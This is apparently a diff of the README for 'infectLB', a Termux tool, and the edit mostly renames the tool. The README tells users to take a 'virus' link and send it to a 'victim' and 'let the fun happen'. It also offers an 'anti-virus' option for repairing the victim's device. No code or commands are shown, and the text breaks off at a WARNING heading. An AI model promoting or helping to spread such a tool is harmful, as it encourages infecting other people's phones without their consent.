lbkassar/infectlb/README.md

 ```
 ## USAGE OPTIONS [Termux] :

-__INFECT__ :
+__INFECTLB__ :
 - From this option you will get link of virus in your termux just send that link to your victim and let the fun happen.

 __SAVE__ :
 - From this option you can repair damaged device of your victm from that virus by just installing this anti-virus in his device.

 __UPDATE__ :
-- From this option you can update the infect script.
+- From this option you can update the infectLB script.

 __EXIT__ :
-- From this option you can exit from infect tool
+- From this option you can exit from infectLB tool

 ## WARNING :